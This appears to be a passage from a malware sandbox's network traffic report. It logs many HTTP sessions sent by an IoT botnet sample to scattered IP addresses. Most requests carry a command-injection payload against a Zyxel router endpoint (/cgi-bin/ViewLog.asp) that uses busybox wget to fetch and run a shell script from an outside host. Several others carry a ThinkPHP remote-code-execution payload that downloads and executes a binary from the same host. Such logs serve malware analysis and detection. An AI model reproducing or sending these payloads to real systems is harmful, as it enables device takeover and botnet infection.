                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:11.873502970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:16.993186951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1394192.168.2.145829831.136.193.838080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.340363026 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:07.969584942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:09.217509031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:11.873514891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:16.993191004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1395192.168.2.144780631.136.164.728080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.343007088 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:07.969547033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:09.217509031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:11.873444080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:16.993216991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1396192.168.2.145088031.136.136.218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.361619949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:08.001686096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:09.249478102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:11.873415947 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:16.993235111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1397192.168.2.143580231.136.207.268080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.378340006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:08.065574884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:09.409483910 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:12.129431009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1398192.168.2.145940694.63.52.1588080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.422029018 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1399192.168.2.145301294.120.225.28080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.442559958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1400192.168.2.143975094.44.56.1118080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:07.490263939 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1401192.168.2.145367888.213.208.10080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:09.897460938 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1402192.168.2.144414695.216.106.20580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:10.116317987 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:10.334892988 CET373INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:36:10 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1403192.168.2.143343895.101.94.21180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:10.354059935 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:10.592047930 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:36:10 GMT
                                                        Date: Wed, 14 Feb 2024 08:36:10 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 37 66 62 64 32 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 37 37 30 26 23 34 36 3b 33 35 37 38 35 64 34 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;27fbd217&#46;1707899770&#46;35785d4f</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1404192.168.2.1448834112.213.92.18580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:10.749622107 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:11.157088995 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:36:10 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Connection: close
                                                        Content-Type: text/html
